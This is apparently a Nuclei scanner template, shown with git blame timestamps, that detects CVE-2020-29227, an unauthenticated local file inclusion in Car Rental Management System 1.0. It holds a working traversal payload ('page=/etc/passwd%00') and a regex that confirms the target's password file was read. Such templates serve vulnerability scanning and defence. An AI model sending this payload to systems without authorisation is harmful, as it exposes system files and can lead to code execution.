2021-07-20 13:08:18 +00:00
id : CVE-2020-29227
info :
name : Car Rental Management System 1.0 - Local File Inclusion (LFI)
author : daffainfo
2021-09-10 11:26:40 +00:00
severity : critical
2021-07-20 13:08:18 +00:00
description : An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
2021-08-18 11:37:49 +00:00
reference :
2021-07-24 06:45:24 +00:00
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
2021-07-20 13:08:18 +00:00
tags : cve,cve2020,lfi
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2020-29227
2021-07-20 13:08:18 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/index.php?page=/etc/passwd%00"
2021-07-24 06:46:30 +00:00
matchers-condition : and
2021-07-20 13:08:18 +00:00
matchers :
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2021-07-20 13:08:18 +00:00
part : body
2021-07-24 06:46:30 +00:00
- type : status
status :
- 200